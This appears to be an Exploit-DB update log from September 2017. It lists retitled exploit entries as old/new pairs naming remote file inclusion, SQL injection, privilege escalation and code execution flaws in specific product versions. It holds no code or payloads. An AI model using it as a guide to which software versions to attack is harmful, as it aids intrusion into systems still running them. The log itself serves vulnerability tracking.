DB: 2017-09-20

8 new exploits

McAfee E-Business Server 8.5.2 - Remote Unauthenticated Code Execution / Denial of Service (PoC)
McAfee E-Business Server 8.5.2 - Unauthenticated Remote Code Execution / Denial of Service (PoC)

Apple macOS - Local Privilege Escalation Due to Lack of Bounds Checking in HIServices Custom CFObject Serialization
Apple macOS - Privilege Escalation Due to Lack of Bounds Checking in HIServices Custom CFObject Serialization
Microsoft Edge 38.14393.1066.0 - Memory Corruption with Partial Page Loading
Microsoft Edge 38.14393.1066.0 - 'COptionsCollectionCacheItem::GetAt' Out-of-Bounds Read

Xcode OpenBase 9.1.5 (OSX) - (root file create) Privilege Escalation
Xcode OpenBase 9.1.5 (OSX) - (Root File Create) Privilege Escalation

Xcode OpenBase 10.0.0 (OSX) - (unsafe system call) Privilege Escalation
Xcode OpenBase 10.0.0 (OSX) - (Unsafe System Call) Privilege Escalation

eTrust AntiVirus Agent r8 - Local Privilege Escalation
eTrust AntiVirus Agent r8 - Privilege Escalation

WICD 1.7.1 - Local Privilege Escalation
WICD 1.7.1 - Privilege Escalation

Novell Client 4.91 SP4 - Local Privilege Escalation
Novell Client 4.91 SP4 - Privilege Escalation

H-Sphere Webshell 2.4 - Privilege Escalation
H-Sphere WebShell 2.4 - Privilege Escalation

Zend Platform 2.2.1 - PHP.INI File Modification
Zend Platform 2.2.1 - 'PHP.INI' File Modification

AIX 7.1 - lquerylv Privilege Escalation
AIX 7.1 - 'lquerylv' Privilege Escalation

sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation
Sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation

Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation
Serviio PRO 1.8 DLNA Media Streaming Server - Privilege Escalation

Automated Logic WebCTRL 6.5 - Local Privilege Escalation
Automated Logic WebCTRL 6.5 - Privilege Escalation

Netdecision 5.8.2 - Local Privilege Escalation
Netdecision 5.8.2 - Privilege Escalation

H-Sphere Webshell 2.4 - Remote Command Execution
H-Sphere WebShell 2.4 - Remote Command Execution

NetIQ Privileged User Manager 2.3.1 - 'ldapagnt_eval()' Remote Perl Code Execution (Metasploit)
NetIQ Privileged User Manager 2.3.1 - 'ldapagnt_eval()' Perl Remote Code Execution (Metasploit)

STUNSHELL Web Shell - Remote PHP Code Execution (Metasploit)
STUNSHELL Web Shell - PHP Remote Code Execution (Metasploit)

v0pCr3w Web Shell - Remote Code Execution (Metasploit)
v0pCr3w (Web Shell) - Remote Code Execution (Metasploit)

InstantCMS 1.6 - Remote PHP Code Execution (Metasploit)
InstantCMS 1.6 - PHP Remote Code Execution (Metasploit)

Drupal Module RESTWS 7.x - Remote PHP Code Execution (Metasploit)
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)

HPE < 7.2 - Java Deserialization

Tecnovision DLX Spot - SSH Backdoor

phpBB 2.0.15 - (highlight) Remote PHP Code Execution
phpBB 2.0.15 - 'highlight' PHP Remote Code Execution

phpBB 2.0.15 - Remote PHP Code Execution (Metasploit)
phpBB 2.0.15 - PHP Remote Code Execution (Metasploit)

versatileBulletinBoard 1.00 RC2 - (board takeover) SQL Injection
versatileBulletinBoard 1.00 RC2 - 'board takeover' SQL Injection

VuBB Forum RC1 - (m) SQL Injection
VuBB Forum RC1 - 'm' SQL Injection
Wizz Forum 1.20 - (TopicID) SQL Injection
PHPWebThings 1.4 - (msg/forum) SQL Injection
Wizz Forum 1.20 - 'TopicID' SQL Injection
PHPWebThings 1.4 - 'msg'/'forum' SQL Injection

webSPELL 4.01 - (title_op) SQL Injection
webSPELL 4.01 - 'title_op' SQL Injection

YapBB 1.2 - (cfgIncludeDirectory) Remote Command Execution
YapBB 1.2 - 'cfgIncludeDirectory' Remote Command Execution
TopList 1.3.8 - (phpBB Hack) Remote File Inclusion (1)
Advanced Guestbook 2.4.0 - (phpBB) File Inclusion
TopList 1.3.8 - (phpBB Hack) Remote File Inclusion (2)
Advanced Guestbook 2.4.0 - (phpBB) Remote File Inclusion
TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (1)
Advanced Guestbook 2.4.0 - 'phpBB' File Inclusion
TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (2)
Advanced Guestbook 2.4.0 - 'phpBB' Remote File Inclusion

Knowledge Base Mod 2.0.2 - (phpBB) Remote File Inclusion
Knowledge Base Mod 2.0.2 - 'phpBB' Remote File Inclusion
phpRaid 3.0.b3 - (phpBB/SMF) Remote File Inclusion
pafileDB 2.0.1 - (mxBB/phpBB) Remote File Inclusion
phpRaid 3.0.b3 - 'phpBB'/'SMF' Remote File Inclusion
pafileDB 2.0.1 - 'mxBB'/'phpBB' Remote File Inclusion

Foing 0.7.0 - (phpBB) Remote File Inclusion
Foing 0.7.0 - 'phpBB' Remote File Inclusion

Activity MOD Plus 1.1.0 - (phpBB Mod) File Inclusion
Activity MOD Plus 1.1.0 - 'phpBB Mod' File Inclusion

Blend Portal 1.2.0 - (phpBB Mod) Remote File Inclusion
Blend Portal 1.2.0 - 'phpBB Mod' Remote File Inclusion

XMB 1.9.6 - (u2uid) SQL Injection (mq=off)
XMB 1.9.6 - (mq=off) 'u2uid' SQL Injection

Web3news 0.95 - (PHPSECURITYADMIN_PATH) Remote File Inclusion
Web3news 0.95 - 'PHPSECURITYADMIN_PATH' Remote File Inclusion

Yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion
Yappa-ng 2.3.1 - 'admin_modules' Remote File Inclusion

TualBLOG 1.0 - (icerikno) SQL Injection
TualBLOG 1.0 - 'icerikno' SQL Injection

Tekman Portal 1.0 - (tr) SQL Injection
Tekman Portal 1.0 - 'tr' SQL Injection

MyReview 1.9.4 - (email) SQL Injection / Code Execution
MyReview 1.9.4 - 'email' SQL Injection / Code Execution

phpQuestionnaire 3.12 - (phpQRootDir) Remote File Inclusion
phpQuestionnaire 3.12 - 'phpQRootDir' Remote File Inclusion

phpBB Static Topics 1.0 - phpbb_root_path File Inclusion
phpBB Static Topics 1.0 - 'phpbb_root_path' File Inclusion

CentiPaid 1.4.2 - centipaid_class.php Remote File Inclusion
CentiPaid 1.4.2 - 'centipaid_class.php' Remote File Inclusion

webSPELL 4.01.01 - (getsquad) SQL Injection
webSPELL 4.01.01 - 'getsquad' SQL Injection

Osprey 1.0 - GetRecord.php Remote File Inclusion
Osprey 1.0 - 'GetRecord.php' Remote File Inclusion
Techno Dreams Announcement - (key) SQL Injection
Techno Dreams Guestbook 1.0 - (key) SQL Injection
Techno Dreams Announcement - 'key' SQL Injection
Techno Dreams Guestbook 1.0 - 'key' SQL Injection

GEPI 1.4.0 - gestion/savebackup.php Remote File Inclusion
GEPI 1.4.0 - 'gestion/savebackup.php' Remote File Inclusion

PHPGiggle 12.08 - (CFG_PHPGIGGLE_ROOT) File Inclusion
PHPGiggle 12.08 - 'CFG_PHPGIGGLE_ROOT' File Inclusion

mxBB Module Meeting 1.1.2 - Remote FileInclusion
mxBB Module Meeting 1.1.2 - Remote File Inclusion

Uploader & Downloader 3.0 - (id_user) SQL Injection
Uploader & Downloader 3.0 - 'id_user' SQL Injection

The Classified Ad System 1.0 - (main) SQL Injection
The Classified Ad System 1.0 - 'main' SQL Injection

VisoHotlink 1.01 - functions.visohotlink.php Remote File Inclusion
VisoHotlink 1.01 - 'functions.visohotlink.php' Remote File Inclusion

vhostadmin 0.1 - (MODULES_DIR) Remote File Inclusion
vhostadmin 0.1 - 'MODULES_DIR' Remote File Inclusion

XLAtunes 0.1 - (album) SQL Injection
XLAtunes 0.1 - 'album' SQL Injection

webSPELL 4.01.02 - (topic) SQL Injection
webSPELL 4.01.02 - 'topic' SQL Injection

webSPELL 4.01.02 - Remote PHP Code Execution
webSPELL 4.01.02 - PHP Remote Code Execution

PHP-Nuke - iFrame (iframe.php) Remote File Inclusion
PHP-Nuke - 'iframe.php' Remote File Inclusion

XOOPS Module Camportail 1.1 - (camid) SQL Injection
XOOPS Module Camportail 1.1 - 'camid' SQL Injection

Mutant 0.9.2 - mutant_functions.php Remote File Inclusion
Mutant 0.9.2 - 'mutant_functions.php' Remote File Inclusion

Original 0.11 - config.inc.php x[1] Remote File Inclusion
Original 0.11 - 'config.inc.php' 'x[1]' Remote File Inclusion

Glossword 1.8.1 - custom_vars.php Remote File Inclusion
Glossword 1.8.1 - 'custom_vars.php' Remote File Inclusion

GeekLog 2.x - ImageImageMagick.php Remote File Inclusion
GeekLog 2.x - 'ImageImageMagick.php' Remote File Inclusion

Vizayn Urun Tanitim Sistemi 0.2 - (tr) SQL Injection
Vizayn Urun Tanitim Sistemi 0.2 - 'tr' SQL Injection

WBB2-Addon: Acrotxt 1.0 - (show) SQL Injection
WBB2-Addon: Acrotxt 1.0 - 'show' SQL Injection

STPHPLibrary - (STPHPLIB_DIR) Remote File Inclusion
STPHPLibrary - 'STPHPLIB_DIR' Remote File Inclusion

phpFFL 1.24 - PHPFFL_FILE_ROOT Remote File Inclusion
phpFFL 1.24 - 'PHPFFL_FILE_ROOT' Remote File Inclusion

phpBB Mod OpenID 0.2.0 - BBStore.php Remote File Inclusion
phpBB Mod OpenID 0.2.0 - 'BBStore.php' Remote File Inclusion

LiveAlbum 0.9.0 - common.php Remote File Inclusion
LiveAlbum 0.9.0 - 'common.php' Remote File Inclusion

Pindorama 0.1 - client.php Remote File Inclusion
Pindorama 0.1 - 'client.php' Remote File Inclusion
Socketmail 2.2.8 - fnc-readmail3.php Remote File Inclusion
TOWeLS 0.1 - scripture.php Remote File Inclusion
Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion
TOWeLS 0.1 - 'scripture.php' Remote File Inclusion

Sige 0.1 - sige_init.php Remote File Inclusion
Sige 0.1 - 'sige_init.php' Remote File Inclusion

Scribe 0.2 - Remote PHP Code Execution
Scribe 0.2 - PHP Remote Code Execution

patBBcode 1.0 - bbcodeSource.php Remote File Inclusion
patBBcode 1.0 - 'bbcodeSource.php' Remote File Inclusion

Tilde CMS 4.x - (aarstal) SQL Injection
Tilde CMS 4.x - 'aarstal' SQL Injection

CityWriter 0.9.7 - head.php Remote File Inclusion
CityWriter 0.9.7 - 'head.php' Remote File Inclusion

PhpMyDesktop/Arcade 1.0 Final - (phpdns_basedir) Remote File Inclusion
PhpMyDesktop/Arcade 1.0 Final - 'phpdns_basedir' Remote File Inclusion

WebSihirbazi 5.1.1 - (pageid) SQL Injection
WebSihirbazi 5.1.1 - 'pageid' SQL Injection

Blakord Portal Beta 1.3.A - (all modules) SQL Injection
Blakord Portal Beta 1.3.A - (All Modules) SQL Injection

PHP Links 1.3 - smarty.php Remote File Inclusion
PHP Links 1.3 - 'smarty.php' Remote File Inclusion

Aterr 0.9.1 - Local File Inclusion (PHP5)
Aterr 0.9.1 - PHP5 Local File Inclusion

phpEmployment - (PHP upload) Arbitrary File Upload
phpEmployment - 'PHP Upload' Arbitrary File Upload

XOOPS 2.3.2 - 'mydirname' Remote PHP Code Execution
XOOPS 2.3.2 - 'mydirname' PHP Remote Code Execution

Xplode CMS - (wrap_script) SQL Injection
Xplode CMS - 'wrap_script' SQL Injection

VS PANEL 7.3.6 - (Cat_ID) SQL Injection
VS PANEL 7.3.6 - 'Cat_ID' SQL Injection

WebMember 1.0 - (formID) SQL Injection
WebMember 1.0 - 'formID' SQL Injection

Dokuwiki 2009-02-14 - Remote/Temporary File Inclusion
Dokuwiki 2009-02-14 - Temporary/Remote File Inclusion

Kjtechforce mailman b1 - (code) SQL Injection Delete Row
Kjtechforce mailman b1 - (Delete Row) 'code' SQL Injection

Virtue Classifieds - (category) SQL Injection
Virtue Classifieds - 'category' SQL Injection

XOOPS Celepar Module Qas - (codigo) SQL Injection
XOOPS Celepar Module Qas - 'codigo' SQL Injection

URA 3.0 - (cat) SQL Injection
URA 3.0 - 'cat' SQL Injection

TYPO3 CMS 4.0 - (showUid) SQL Injection
TYPO3 CMS 4.0 - 'showUid' SQL Injection

Typing Pal 1.0 - (idTableProduit) SQL Injection
Typing Pal 1.0 - 'idTableProduit' SQL Injection

Videos Broadcast Yourself 2 - (UploadID) SQL Injection
Videos Broadcast Yourself 2 - 'UploadID' SQL Injection

Uiga Church Portal - (year) SQL Injection
Uiga Church Portal - 'year' SQL Injection

Network Management/Inventory System - header.php Remote File Inclusion
Network Management/Inventory System - 'header.php' Remote File Inclusion

BASE 1.2.4 - base_qry_common.php Remote File Inclusion (Metasploit)
BASE 1.2.4 - 'base_qry_common.php' Remote File Inclusion (Metasploit)

PHP-Nuke 8.0 - ' News Module Cross-Site Scripting / HTML Code Injection
PHP-Nuke 8.0 - (News Module) Cross-Site Scripting / HTML Code Injection

Vivid Ads Shopping Cart - (prodid) SQL Injection
Vivid Ads Shopping Cart - 'prodid' SQL Injection

WorldPay Script Shop - (productdetail) SQL Injection
WorldPay Script Shop - 'productdetail' SQL Injection

tincan ltd - (section) SQL Injection
tincan ltd - 'section' SQL Injection

Template Seller Pro 3.25 - (tempid) SQL Injection
Template Seller Pro 3.25 - 'tempid' SQL Injection

Webloader 7 < 8 - (vid) SQL Injection
Webloader 7 < 8 - 'vid' SQL Injection

web5000 - (page_show) SQL Injection
web5000 - 'page_show' SQL Injection

Cosmos Solutions CMS - (id= / page=) SQL Injection
Cosmos Solutions CMS - 'id=' / 'page=' SQL Injection

iBoutique - (page) SQL Injection / Cross-Site Scripting
iBoutique - 'page' SQL Injection / Cross-Site Scripting

OpenX - (phpAdsNew) Remote File Inclusion
OpenX - 'phpAdsNew' Remote File Inclusion

System Shop - (Module aktka) SQL Injection
System Shop - 'Module aktka' SQL Injection

TikiWiki tiki-graph_formula - Remote PHP Code Execution (Metasploit)
TikiWiki tiki-graph_formula - PHP Remote Code Execution (Metasploit)

vBulletin 4.0.x 4.1.3 - (messagegroupid) SQL Injection
vBulletin 4.0.x 4.1.3 - 'messagegroupid' SQL Injection

PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection (1)
PmWiki 2.2.34 - 'pagelist' Remote PHP Code Injection (1)

YABB SE 0.8/1.4/1.5 - Packages.php Remote File Inclusion
YABB SE 0.8/1.4/1.5 - 'Packages.php' Remote File Inclusion

Invision Board 1.1.1 - ipchat.php Remote File Inclusion
Invision Board 1.1.1 - 'ipchat.php' Remote File Inclusion

Typo3 3.5 b5 - Translations.php Remote File Inclusion
Typo3 3.5 b5 - 'Translations.php' Remote File Inclusion

Webchat 0.77 - Defines.php Remote File Inclusion
Webchat 0.77 - 'Defines.php' Remote File Inclusion

PHP-Nuke 6.5 - Multiple Downloads Module SQL Injection
PHP-Nuke 6.5 - (Multiple Downloads Module) SQL Injection

ttCMS 2.2/2.3 - header.php Remote File Inclusion
ttCMS 2.2/2.3 - 'header.php' Remote File Inclusion

PMachine 2.2.1 - Lib.Inc.php Remote File Inclusion Command Execution
PMachine 2.2.1 - 'Lib.Inc.php' Remote File Inclusion / Command Execution

HolaCMS 1.2.x - HTMLtags.php Local File Inclusion
HolaCMS 1.2.x - 'HTMLtags.php' Local File Inclusion

WebCalendar 0.9.x - Multiple Module SQL Injection
WebCalendar 0.9.x - (Multiple Modules) SQL Injection

PHP-Nuke 6.x - Multiple Module SQL Injection
PHP-Nuke 6.x - (Multiple Modules) SQL Injection

EasyDynamicPages 1.0 - 'config_page.php' Remote PHP File Inclusion
EasyDynamicPages 1.0 - 'config_page.php' PHP Remote File Inclusion

VisualShapers EZContents 1.4/2.0 - module.php Remote Command Execution
VisualShapers EZContents 1.4/2.0 - 'module.php' Remote Command Execution

Mambo Open Source 4.5/4.6 - mod_mainmenu.php Remote File Inclusion
Mambo Open Source 4.5/4.6 - 'mod_mainmenu.php' Remote File Inclusion

PHPGedView 2.x - [GED_File]_conf.php Remote File Inclusion
PHPGedView 2.x - '[GED_File]_conf.php' Remote File Inclusion
Laurent Adda Les Commentaires 2.0 - PHP Script fonctions.lib.php Remote File Inclusion
Laurent Adda Les Commentaires 2.0 - PHP Script derniers_commentaires.php Remote File Inclusion
Laurent Adda Les Commentaires 2.0 - PHP Script admin.php Remote File Inclusion
Laurent Adda Les Commentaires 2.0 - PHP Script 'fonctions.lib.php' Remote File Inclusion
Laurent Adda Les Commentaires 2.0 - PHP Script 'derniers_commentaires.php' Remote File Inclusion
Laurent Adda Les Commentaires 2.0 - PHP Script 'admin.php' Remote File Inclusion
VisualShapers EZContents 1.x/2.0 - db.php Arbitrary File Inclusion
VisualShapers EZContents 1.x/2.0 - archivednews.php Arbitrary File Inclusion
VisualShapers EZContents 1.x/2.0 - 'db.php' Arbitrary File Inclusion
VisualShapers EZContents 1.x/2.0 - 'archivednews.php' Arbitrary File Inclusion

VirtuaSystems VirtuaNews 1.0.x - Multiple Module Cross-Site Scripting Vulnerabilities
VirtuaSystems VirtuaNews 1.0.x - (Multiple Modules) Cross-Site Scripting Vulnerabilities

WarpSpeed 4nAlbum Module 0.92 - displaycategory.php basepath Parameter Remote File Inclusion
WarpSpeed 4nAlbum Module 0.92 - 'displaycategory.php' 'basepath' Parameter Remote File Inclusion

Gemitel 3.50 - affich.php Remote File Inclusion Command Injection
Gemitel 3.50 - 'affich.php' Remote File Inclusion / Command Injection

phpBB 2.0.x - album_portal.php Remote File Inclusion
phpBB 2.0.x - 'album_portal.php' Remote File Inclusion

Mail Manage EX 3.1.8 MMEX - Script Settings Parameter Remote PHP File Inclusion
Mail Manage EX 3.1.8 MMEX - Script Settings Parameter PHP Remote File Inclusion

Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x - Common.php Remote File Inclusion
Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x - 'Common.php' Remote File Inclusion

@lexPHPTeam @lex Guestbook 3.12 - Remote PHP File Inclusion
@lexPHPTeam @lex Guestbook 3.12 - PHP Remote File Inclusion

phpBB 2.0.x - 'admin_cash.php' Remote PHP File Inclusion
phpBB 2.0.x - 'admin_cash.php' PHP Remote File Inclusion

Stadtaus.Com Download Center Lite 1.5 - Remote PHP File Inclusion
Stadtaus.Com Download Center Lite 1.5 - PHP Remote File Inclusion

Work System eCommerce 3.0.3/3.0.4 - forum.php Remote File Inclusion
Work System eCommerce 3.0.3/3.0.4 - 'forum.php' Remote File Inclusion

phpGroupWare 0.9.14 - Tables_Update.Inc.php Remote File Inclusion
phpGroupWare 0.9.14 - 'Tables_Update.Inc.php' Remote File Inclusion

PANews 2.0 - Remote PHP Script Code Execution
PANews 2.0 - PHP Remote Code Execution

VoteBox 2.0 - Votebox.php Remote File Inclusion
VoteBox 2.0 - 'Votebox.php' Remote File Inclusion

McNews 1.x - install.php Arbitrary File Inclusion
McNews 1.x - 'install.php' Arbitrary File Inclusion

Vortex Portal 2.0 - content.php act Parameter Remote File Inclusion
Vortex Portal 2.0 - 'content.php' act Parameter Remote File Inclusion

phpBB 1.x/2.0.x - Knowledge Base Module KB.php SQL Injection
phpBB 1.x/2.0.x - (Knowledge Base Module) 'KB.php' SQL Injection

GrayCMS 1.1 - error.php Remote File Inclusion
GrayCMS 1.1 - 'error.php' Remote File Inclusion

PHP Poll Creator 1.0.1 - Poll_Vote.php Remote File Inclusion
PHP Poll Creator 1.0.1 - 'Poll_Vote.php' Remote File Inclusion

MWChat 6.7 - Start_Lobby.php Remote File Inclusion
MWChat 6.7 - 'Start_Lobby.php' Remote File Inclusion

Popper Webmail 1.41 - ChildWindow.Inc.php Remote File Inclusion
Popper Webmail 1.41 - 'ChildWindow.Inc.php' Remote File Inclusion

RaXnet Cacti 0.5/0.6/0.8 - Config_Settings.php Remote File Inclusion
RaXnet Cacti 0.5/0.6/0.8 - 'Config_Settings.php' Remote File Inclusion

RaXnet Cacti 0.5/0.6/0.8 - Top_Graph_Header.php Remote File Inclusion
RaXnet Cacti 0.5/0.6/0.8 - 'Top_Graph_Header.php' Remote File Inclusion

MyGuestbook 0.6.1 - Form.Inc.php3 Remote File Inclusion
MyGuestbook 0.6.1 - 'Form.Inc.php3' Remote File Inclusion

Comdev eCommerce 3.0 - config.php Remote File Inclusion
Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion

PHPWebNotes 2.0 - Api.php Remote File Inclusion
PHPWebNotes 2.0 - 'Api.php' Remote File Inclusion

Autolinks 2.1 Pro - Al_initialize.php Remote File Inclusion
Autolinks 2.1 Pro - 'Al_initialize.php' Remote File Inclusion
MySource 2.14 - Socket.php PEAR_PATH Remote File Inclusion
MySource 2.14 - Request.php PEAR_PATH Remote File Inclusion
MySource 2.14 - 'Socket.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'Request.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - mail.php PEAR_PATH Remote File Inclusion
MySource 2.14 - Date.php PEAR_PATH Remote File Inclusion
MySource 2.14 - Span.php PEAR_PATH Remote File Inclusion
MySource 2.14 - mimeDecode.php PEAR_PATH Remote File Inclusion
MySource 2.14 - mime.php PEAR_PATH Remote File Inclusion
MySource 2.14 - 'mail.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'Date.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'Span.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'mimeDecode.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'mime.php' 'PEAR_PATH' Remote File Inclusion

Help Center Live 1.0/1.2/2.0 - module.php Local File Inclusion
Help Center Live 1.0/1.2/2.0 - 'module.php' Local File Inclusion

Tru-Zone Nuke ET 3.x - Search Module SQL Injection
Tru-Zone Nuke ET 3.x - (Search Module) SQL Injection

vtiger CRM 4.2 - RSS Aggregation Module Feed Cross-Site Scripting
vtiger CRM 4.2 - (RSS Aggregation Module Feed) Cross-Site Scripting

CF_Nuke 4.6 - index.cfm Local File Inclusion
CF_Nuke 4.6 - 'index.cfm' Local File Inclusion

Tolva 0.1 - Usermods.php Remote File Inclusion
Tolva 0.1 - 'Usermods.php' Remote File Inclusion

SPiD 1.3.1 - Scan_Lang_Insert.php Local File Inclusion
SPiD 1.3.1 - 'Scan_Lang_Insert.php' Local File Inclusion

PHORUM 3.x/5.x - Common.php Remote File Inclusion
PHORUM 3.x/5.x - 'Common.php' Remote File Inclusion

SPIP 1.8.3 - Spip_login.php Remote File Inclusion
SPIP 1.8.3 - 'Spip_login.php' Remote File Inclusion

CyBoards PHP Lite 1.21/1.25 - Common.php Remote File Inclusion
CyBoards PHP Lite 1.21/1.25 - 'Common.php' Remote File Inclusion

Monster Top List 1.4 - functions.php Remote File Inclusion
Monster Top List 1.4 - 'functions.php' Remote File Inclusion

I-RATER Platinum - Common.php Remote File Inclusion
I-RATER Platinum - 'Common.php' Remote File Inclusion

I-RATER Platinum - Config_settings.TPL.php Remote File Inclusion
I-RATER Platinum - 'Config_settings.TPL.php' Remote File Inclusion

Advanced Guestbook 2.x - Addentry.php Remote File Inclusion
Advanced Guestbook 2.x - 'Addentry.php' Remote File Inclusion
DMCounter 0.9.2 -b - Kopf.php Remote File Inclusion
phpBB Knowledge Base 2.0.2 - Mod KB_constants.php Remote File Inclusion
DMCounter 0.9.2 -b - 'Kopf.php' Remote File Inclusion
phpBB Knowledge Base 2.0.2 - 'Mod KB_constants.php' Remote File Inclusion

ISPConfig 2.2.2/2.2.3 - Session.INC.php Remote File Inclusion
ISPConfig 2.2.2/2.2.3 - 'Session.INC.php' Remote File Inclusion

RadScripts RadLance 7.0 - popup.php Local File Inclusion
RadScripts RadLance 7.0 - 'popup.php' Local File Inclusion

osTicket 1.x - Open_form.php Remote File Inclusion
osTicket 1.x - 'Open_form.php' Remote File Inclusion

Squirrelmail 1.4.x - Redirect.php Local File Inclusion
Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion

phpBB 2.0.x - template.php Remote File Inclusion
phpBB 2.0.x - 'template.php' Remote File Inclusion

phpBB - BBRSS.php Remote File Inclusion
phpBB - 'BBRSS.php' Remote File Inclusion

eNpaper1 - Root_Header.php Remote File Inclusion
eNpaper1 - 'Root_Header.php' Remote File Inclusion

CrisoftRicette 1.0 - Cookbook.php Remote File Inclusion
CrisoftRicette 1.0 - 'Cookbook.php' Remote File Inclusion

MF Piadas 1.0 - admin.php Remote File Inclusion
MF Piadas 1.0 - 'admin.php' Remote File Inclusion

SiteBuilder-FX - top.php Remote File Inclusion
SiteBuilder-FX - 'top.php' Remote File Inclusion

Blog:CMS 4.1 - Thumb.php Remote File Inclusion
Blog:CMS 4.1 - 'Thumb.php' Remote File Inclusion

Extcalendar 2.0 - Extcalendar.php Remote File Inclusion
Extcalendar 2.0 - 'Extcalendar.php' Remote File Inclusion

RW::Download - stats.php Remote File Inclusion
RW::Download - 'stats.php' Remote File Inclusion

PHP Event Calendar 1.4 - calendar.php Remote File Inclusion
PHP Event Calendar 1.4 - 'calendar.php' Remote File Inclusion

Forum 5 - pm.php Local File Inclusion
Forum 5 - 'pm.php' Local File Inclusion

Advanced Poll 2.0.2 - common.inc.php Remote File Inclusion
Advanced Poll 2.0.2 - 'common.inc.php' Remote File Inclusion

Prince Clan Chess Club 0.8 - Include.PCchess.php Remote File Inclusion
Prince Clan Chess Club 0.8 - 'Include.PCchess.php' Remote File Inclusion

Bosdates 3.x/4.0 - Payment.php Remote File Inclusion
Bosdates 3.x/4.0 - 'Payment.php' Remote File Inclusion

Moskool 1.5 Component - Admin.Moskool.php Remote File Inclusion
Moskool 1.5 Component - 'Admin.Moskool.php' Remote File Inclusion

WoW Roster 1.5 - hsList.php subdir Parameter Remote File Inclusion
WoW Roster 1.5 - 'hsList.php' 'subdir' Parameter Remote File Inclusion
VWar 1.5 - war.php vwar_root Parameter Remote File Inclusion
VWar 1.5 - member.php vwar_root Parameter Remote File Inclusion
VWar 1.5 - calendar.php vwar_root Parameter Remote File Inclusion
VWar 1.5 - challenge.php vwar_root Parameter Remote File Inclusion
VWar 1.5 - joinus.php vwar_root Parameter Remote File Inclusion
VWar 1.5 - news.php vwar_root Parameter Remote File Inclusion
VWar 1.5 - stats.php vwar_root Parameter Remote File Inclusion
VWar 1.5 - 'war.php' vwar_root Parameter Remote File Inclusion
VWar 1.5 - 'member.php' vwar_root Parameter Remote File Inclusion
VWar 1.5 - 'calendar.php' vwar_root Parameter Remote File Inclusion
VWar 1.5 - 'challenge.php' vwar_root Parameter Remote File Inclusion
VWar 1.5 - 'joinus.php' vwar_root Parameter Remote File Inclusion
VWar 1.5 - 'news.php' vwar_root Parameter Remote File Inclusion
VWar 1.5 - 'stats.php' vwar_root Parameter Remote File Inclusion

Mafia Moblog 6 - Big.php Remote File Inclusion
Mafia Moblog 6 - 'Big.php' Remote File Inclusion

WEBinsta Mailing List Manager 1.3 - Install3.php Remote File Inclusion
WEBinsta Mailing List Manager 1.3 - 'Install3.php' Remote File Inclusion

Zen Cart Web Shopping Cart 1.x - autoload_func.php autoLoadConfig[999][0][loadFile] Parameter Remote File Inclusion
Zen Cart Web Shopping Cart 1.x - 'autoload_func.php' 'autoLoadConfig[999][0][loadFile]' Parameter Remote File Inclusion

Jetbox CMS 2.1 - Search_function.php Remote File Inclusion
Jetbox CMS 2.1 - 'Search_function.php' Remote File Inclusion

In-portal In-Link 2.3.4 - ADODB_DIR.php Remote File Inclusion
In-portal In-Link 2.3.4 - 'ADODB_DIR.php' Remote File Inclusion

PHP-Proxima 6.0 - BB_Smilies.php Local File Inclusion
PHP-Proxima 6.0 - 'BB_Smilies.php' Local File Inclusion
WM-News 0.5 - print.php Local File Inclusion
Ractive Popper 1.41 - Childwindow.Inc.php Remote File Inclusion
WM-News 0.5 - 'print.php' Local File Inclusion
Ractive Popper 1.41 - 'Childwindow.Inc.php' Remote File Inclusion

Exporia 0.3 - Common.php Remote File Inclusion
Exporia 0.3 - 'Common.php' Remote File Inclusion

My-BIC 0.6.5 - Mybic_Server.php Remote File Inclusion
My-BIC 0.6.5 - 'Mybic_Server.php' Remote File Inclusion

Geotarget - script.php Remote File Inclusion
Geotarget - 'script.php' Remote File Inclusion

PHPSelect Web Development - index.php3 Remote File Inclusion
PHPSelect Web Development - 'index.php3' Remote File Inclusion

PHP Web Scripts Easy Banner - functions.php Remote File Inclusion
PHP Web Scripts Easy Banner - 'functions.php' Remote File Inclusion

PHP Polling Creator 1.03 - functions.inc.php Remote File Inclusion
PHP Polling Creator 1.03 - 'functions.inc.php' Remote File Inclusion
Softerra PHP Developer Library 1.5.3 - Grid3.lib.php Remote File Inclusion
BlueShoes Framework 4.6 - GoogleSearch.php Remote File Inclusion
Tagit2b - DelTagUser.php Remote File Inclusion
Softerra PHP Developer Library 1.5.3 - 'Grid3.lib.php' Remote File Inclusion
BlueShoes Framework 4.6 - 'GoogleSearch.php' Remote File Inclusion
Tagit2b - 'DelTagUser.php' Remote File Inclusion

CommunityPortals 1.0 - bug.php Remote File Inclusion
CommunityPortals 1.0 - 'bug.php' Remote File Inclusion

PHP TopSites FREE 1.022b - config.php Remote File Inclusion
PHP TopSites FREE 1.022b - 'config.php' Remote File Inclusion

Buzlas 2006-1 Full - Archive_Topic.php Remote File Inclusion
Buzlas 2006-1 Full - 'Archive_Topic.php' Remote File Inclusion

phpBB Add Name Module - Not_Mem.php Remote File Inclusion
phpBB Add Name Module - 'Not_Mem.php' Remote File Inclusion
RamaCMS - ADODB.Inc.php Remote File Inclusion
H-Sphere Webshell 2.x - 'login.php' Cross-Site Scripting
Mambo Module MOStlyCE 4.5.4 - HTMLTemplate.php Remote File Inclusion
Lodel CMS 0.7.3 - Calcul-page.php Remote File Inclusion
RamaCMS - 'ADODB.Inc.php' Remote File Inclusion
H-Sphere WebShell 2.x - 'login.php' Cross-Site Scripting
Mambo Module MOStlyCE 4.5.4 - 'HTMLTemplate.php' Remote File Inclusion
Lodel CMS 0.7.3 - 'Calcul-page.php' Remote File Inclusion

Maintain 3.0.0-RC2 - Example6.php Remote File Inclusion
